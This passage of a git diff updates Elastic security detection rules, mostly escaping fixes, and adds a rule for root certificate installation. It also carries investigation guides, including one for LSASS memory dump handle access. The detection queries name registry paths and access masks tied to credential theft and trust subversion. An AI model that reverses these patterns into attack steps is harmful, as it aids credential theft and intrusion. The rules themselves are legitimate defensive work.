rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_108.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_108.json new file mode 100644 index 00000000000..32cf27d1372 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_108.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.", + "false_positives": [ + "Certain applications may install root certificates for the purpose of inspecting SSL traffic." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Root Certificate", + "note": "## Triage and analysis\n\n### Investigating Creation or Modification of Root Certificate\n\nRoot certificates are the primary level of certifications that tell a browser that the communication is trusted and legitimate. This verification is based upon the identification of a certification authority. Windows adds several trusted root certificates so browsers can use them to communicate with websites.\n\n[Check out this post](https://www.thewindowsclub.com/what-are-root-certificates-windows) for more details on root certificates and the involved cryptography.\n\nThis rule identifies the creation or modification of a root certificate by monitoring registry modifications. The installation of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, other registry or file modifications, and any spawned child processes.\n- If one of the processes is suspicious, retrieve it and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path :\n (\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\"\n ) and\n not process.executable : (\n \"?:\\\\ProgramData\\\\Lenovo\\\\Vantage\\\\Addins\\\\LenovoHardwareScanAddin\\\\*\\\\LdeApi.Server.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptionsPlus\\\\Plugins\\\\64\\\\certmgr.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\ProgramData\\\\Quest\\\\KACE\\\\modules\\\\clientidentifier\\\\clientidentifier.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\CCM\\\\CcmExec.exe\",\n \"?:\\\\Windows\\\\ccmsetup\\\\cache\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\Cluster\\\\clussvc.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\PluginHost86\\\\Lenovo.Modern.ImController.PluginHost.Device.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\Service\\\\Lenovo.Modern.ImController.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\System32\\\\*.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*.exe\"\n )\n", + "references": [ + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://www.ired.team/offensive-security/persistence/t1130-install-root-certificate" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.004", + "name": "Install Root Certificate", + "reference": "https://attack.mitre.org/techniques/T1553/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_102.json b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_102.json index 4c0df8e7b7d..1bf6e0900cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_102.json +++ b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_103.json b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_103.json index 89ad4ce55e7..ca5b29a8f7b 100644 --- a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_104.json b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_104.json index 9561226bc95..20874bf9944 100644 --- a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_205.json b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_205.json index bd680e9b46a..666b9a462ed 100644 --- a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_205.json +++ b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_205.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_102.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_102.json index bcc7745ea47..ae10a57b5b1 100644 --- a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_102.json @@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_103.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_103.json index 76f2d715fa9..ed06a8c9962 100644 --- a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_103.json @@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_104.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_104.json index 4b0e094e795..d053b267992 100644 --- a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_104.json @@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_105.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_105.json index ca7655e49df..355d2df8f8e 100644 --- a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_105.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_106.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_106.json index c4ef82bdf08..d9432f44da2 100644 --- a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_106.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/205b52c4-9c28-4af4-8979-935f3278d61a_1.json b/packages/security_detection_engine/kibana/security_rule/205b52c4-9c28-4af4-8979-935f3278d61a_1.json index e94201e5053..c5bc876b9bd 100644 --- a/packages/security_detection_engine/kibana/security_rule/205b52c4-9c28-4af4-8979-935f3278d61a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/205b52c4-9c28-4af4-8979-935f3278d61a_1.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -61,7 +61,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_105.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_105.json index 786ad7d7d14..3f1a00f4f08 100644 --- a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_105.json +++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where host.os.type == \"windows\" and event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. */\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", @@ -72,7 +72,7 @@ ], "risk_score": 73, "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de", - "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": 